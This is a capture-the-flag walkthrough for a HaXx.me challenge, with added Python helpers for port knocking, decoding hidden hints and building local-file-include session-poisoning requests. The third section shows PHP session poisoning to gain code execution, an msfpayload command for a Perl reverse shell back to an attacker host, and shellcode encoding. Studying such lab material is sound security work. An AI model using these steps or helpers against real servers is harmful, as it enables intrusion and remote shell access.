HaXx.me #04
haxlog
1) The Main Gateway
The game starts with the web page shown above. The clue asks for a text (TXT) record for 127.0.0.1 from the server itself.
The HTML comments might be a hint, along with the web server reporting itself as fake404.intern0t.net. The hint in the ninja TXT record said to go to the default web page of the web server.
The page returned when requesting index.html from the root of the web server looks similar to the page returned for the root itself. One difference is that the server name returned is not fake404.intern0t.net.
Checking the traffic in Fiddler2 shows that the page returned from the root of the web server is not a real 404; it is also 721 bytes larger than an actual 404.
Scrolling to the bottom of the fake 404 page, the following HTML comment appears:
<!--01011001 01101111 01110101 00100000 01101011 01101110 01101111
01110111 00101100 00100000 01101001 01100110 00100000 01111001
01101111 01110101 00100111 01110010 01100101 00100000 01110011
01110100 01110101 01100011 01101011 00100000 01101111 01101110
00100000 01110100 01101000 01100101 00100000 01101110 01110101
01101101 01100010 01100101 01110010 01110011 00101100 00100000
01110100 01110010 01111001 00100000 01101011 01101110 01101111
01100011 01101011 01101001 01101110 01100111 00100001-->
Converting from binary to ASCII, the above translates to
“You know, if you're stuck on the numbers, try knocking!”
A simple nmap scan shows ports 53 and 80 open, with ports 1, 3306 and 31337 filtered.
Could the ninja code be a port-knocking sequence? Try running the knock client against the server with it.
After running the knock sequence, a rescan with nmap shows that port 31337 is now open.
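The knock step above, as an added Python client that is not part of the original writeup and does not depend on knockd's knock binary. It connects to each port of the sequence in order (a refused or dropped connect is fine, since knockd only has to see the SYN) and then checks whether the target port has opened. The sequence itself comes from the ninja code and is supplied on the command line; the default delay, timeout and target port 31337 are assumptions.

```python
import socket
import sys
import time
from typing import List, Tuple


def tcp_probe(host: str, port: int, timeout: float = 0.3) -> int:
    """Attempt one TCP connect. Returns 0 on success, otherwise the errno.

    For knocking the result does not matter: a refused or dropped connect
    still puts a SYN on the wire, which is all knockd watches for."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port))


def knock(host: str, sequence: List[int], delay: float = 0.2,
          timeout: float = 0.3) -> List[Tuple[int, int]]:
    """Knock on each port of `sequence` in order, pausing `delay` seconds
    between knocks so the daemon sees them as distinct events. Returns
    (port, connect result) pairs for the record."""
    results = []
    for port in sequence:
        results.append((port, tcp_probe(host, port, timeout)))
        time.sleep(delay)
    return results


def is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if a full TCP connect to host:port succeeds."""
    return tcp_probe(host, port, timeout) == 0


def parse_sequence(text: str) -> List[int]:
    """Turn '7000 8000 9000' or '7000,8000,9000' into validated port numbers."""
    ports = [int(p) for p in text.replace(",", " ").split()]
    bad = [p for p in ports if not 1 <= p <= 65535]
    if bad:
        raise ValueError(f"invalid port numbers: {bad}")
    if not ports:
        raise ValueError("empty knock sequence")
    return ports


if __name__ == "__main__":
    # usage: knock.py <host> "<port> <port> ..." [target_port]
    host = sys.argv[1]
    seq = parse_sequence(sys.argv[2])
    target = int(sys.argv[3]) if len(sys.argv) > 3 else 31337   # assumed target
    print("before knock:", "open" if is_open(host, target) else "closed/filtered")
    knock(host, seq)
    print("after knock: ", "open" if is_open(host, target) else "closed/filtered")
```

If the port does not open, the usual culprits are the order (knockd is strict about it), the per-knock delay (too fast and the SYNs may be coalesced or reordered) and a sequence that expects UDP knocks; the client above only sends TCP.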
2) The Ninja
Include /etc/ninja? A look at the source of this page may offer deeper insight.
A quick check of the source shows the comment <!-- include($input) // input is a registered global -->. With register_globals on, a request parameter named input becomes $input, so the file to include can be chosen from the URL (for example ?input=/etc/ninja).
A rescan with nmap shows that port 1 on the server is now open.
3) The Base
The Final Destination page has a link to a tarball that contains the source for the baselogin.php (border control login) and controlroom.php (The Final Destination) pages.
A quick review shows that the border control login page (baselogin.php) uses guest and pass as hardcoded credentials, and when they are used the page redirects to controlroom.php.
Moving on to the controlroom.php page source, the following ASCII (in hex) is listed in another HTML comment that appears to be a hint.
\x53\x65\x73\x73\x69\x6f\x6e\x20\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x3a\x20\x2f\x76\x61\x72\x2f\x6c\x69\x62\x2f\x70\x68\x70\x35\x2f
Dumping the hex in Tiny Hexer shows the following ASCII: Session Directory: /var/lib/php5/
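Both hidden comments on this page (the binary one at the bottom of the fake 404 and the \x-escaped one in controlroom.php) decode with a few lines of Python. This is an added example, not code from the writeup: the two hint strings are copied from the page, and the small HTML page that wraps them in the demo is constructed.

```python
import re
from typing import List

# The two hints exactly as they appear in the page source.
BINARY_HINT = """01011001 01101111 01110101 00100000 01101011 01101110 01101111
01110111 00101100 00100000 01101001 01100110 00100000 01111001
01101111 01110101 00100111 01110010 01100101 00100000 01110011
01110100 01110101 01100011 01101011 00100000 01101111 01101110
00100000 01110100 01101000 01100101 00100000 01101110 01110101
01101101 01100010 01100101 01110010 01110011 00101100 00100000
01110100 01110010 01111001 00100000 01101011 01101110 01101111
01100011 01101011 01101001 01101110 01100111 00100001"""

HEX_HINT = (r"\x53\x65\x73\x73\x69\x6f\x6e\x20\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x3a\x20"
            r"\x2f\x76\x61\x72\x2f\x6c\x69\x62\x2f\x70\x68\x70\x35\x2f")


def decode_binary(text: str) -> str:
    """Decode whitespace-separated 8-bit binary groups into ASCII text."""
    groups = text.split()
    bad = [g for g in groups if len(g) != 8 or set(g) - {"0", "1"}]
    if bad:
        raise ValueError(f"not 8-bit binary groups: {bad[:3]}")
    return bytes(int(g, 2) for g in groups).decode("ascii")


def decode_hex_escapes(text: str) -> str:
    """Decode a run of \\xHH escapes (as written in a PHP or C string) into text."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    if not pairs:
        raise ValueError("no \\xHH escapes found")
    return bytes(int(h, 16) for h in pairs).decode("ascii")


def find_comments(html: str) -> List[str]:
    """Return the bodies of all HTML comments, including ones spanning lines."""
    return [c.strip() for c in re.findall(r"<!--(.*?)-->", html, flags=re.S)]


def decode_hint(comment: str) -> str:
    """Pick a decoder from the shape of the comment; pass plain text through."""
    if re.fullmatch(r"[01\s]+", comment):
        return decode_binary(comment)
    if "\\x" in comment:
        return decode_hex_escapes(comment)
    return comment


if __name__ == "__main__":
    # Constructed stand-in for the fetched page source.
    page = f"<html><body>404 Not Found</body><!--{BINARY_HINT}--><!--{HEX_HINT}--></html>"
    for comment in find_comments(page):
        print(decode_hint(comment))
```

Running it prints the two hints, "You know, if you're stuck on the numbers, try knocking!" and "Session Directory: /var/lib/php5/", in the order the comments occur in the page.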
Next, the source shows that the user variable is included by the PHP code.
It would seem the page is vulnerable to a local file include, and the PHP session directory is /var/lib/php5/. Since the session contents are written to a file the application can read, the LFI can be turned into code execution by storing PHP in the session and then including the session file.
Grab the PHPSESSID cookie and set the user variable to the path of the session file (PHP names it sess_<PHPSESSID> inside the session directory).
Setting the PHP session password variable to <?php echo exec('whoami');?> using the baseindex.php page and then reloading the controlroom.php page with the user variable set to the session file shows the following info.
It would seem that perl is available. Using the following msfpayload command, a perl reverse shell can be built:
msfpayload php/reverse_perl LHOST=MYIP LPORT=2024 R
Then set up a netcat listener on an attacker-controlled machine.
After that, set the PHP session password variable to the output of the msfpayload command wrapped in PHP tags using the baseindex.php page, then reload the controlroom.php page with the user variable set to the session file, which gives shell access as www-data. A process list, shown below, divulges a netcat listener running as root. Well, that was easy.
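The session-poisoning steps above, as an added Python helper that is not part of the original writeup. It builds the session file path PHP's files handler uses (sess_<PHPSESSID> under /var/lib/php5/), the record PHP's default serializer writes for a string session variable, and the two requests. The form field names username and password for baseindex.php and the GET parameter user for controlroom.php are assumptions taken from the writeup's wording; the sample cookie value is constructed.

```python
import re
from urllib.parse import urlencode

# Session directory recovered from the hex hint in controlroom.php.
SESSION_DIR = "/var/lib/php5/"
# Alphabet PHP can use for a session id (hash_bits_per_character 4, 5 or 6).
PHPSESSID_RE = re.compile(r"^[A-Za-z0-9,-]{1,128}$")


def session_file_path(phpsessid: str, session_dir: str = SESSION_DIR) -> str:
    """Path PHP's 'files' session handler writes to: <save_path>/sess_<PHPSESSID>.

    The id is checked against PHP's own alphabet so a mangled cookie value
    (or a stray path component) never ends up in the include path."""
    if not PHPSESSID_RE.match(phpsessid):
        raise ValueError(f"not a valid PHPSESSID: {phpsessid!r}")
    return session_dir.rstrip("/") + "/sess_" + phpsessid


def php_session_record(name: str, value: str) -> str:
    """What PHP's default 'php' serializer stores for $_SESSION[name] = value.

    Format is name|s:<byte length>:"value"; and the length counts bytes, not
    characters. include() parses the whole file as PHP, so the name|s:N:"
    prefix is echoed as literal text and the <?php ... ?> inside the value
    executes."""
    return f'{name}|s:{len(value.encode("utf-8"))}:"{value}";'


def poison_form(payload: str, username: str = "guest") -> dict:
    """Form fields for the login page that copies the password into the
    session. Field names are assumptions; the writeup only says the
    'session password variable' is set through baseindex.php."""
    return {"username": username, "password": payload}


def lfi_url(controlroom_url: str, phpsessid: str, param: str = "user") -> str:
    """controlroom.php request that makes it include() the poisoned session file."""
    return controlroom_url + "?" + urlencode({param: session_file_path(phpsessid)})


if __name__ == "__main__":
    sid = "0123456789abcdef0123456789abcdef"       # constructed sample PHPSESSID
    payload = "<?php echo exec('whoami');?>"
    print("POST to baseindex.php:", poison_form(payload))
    print("session file will contain:", php_session_record("password", payload))
    print("then GET:", lfi_url("http://fake404.intern0t.net/controlroom.php", sid))
```

Two practical points fall out of this. The serialized prefix (password|s:28:") is printed before the command output, which is why the whoami result appears in the page after some junk; and the reverse shell payload must go in as one string, so the length field is whatever PHP computes when the session is saved, not something the attacker has to get right.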
Next, dump the shellcode from the text file to a .bin file and use msfencode to quickly build an exe.
As the shellcode lives entirely inside the text segment, that section will need to be set to full (read, write and execute) access.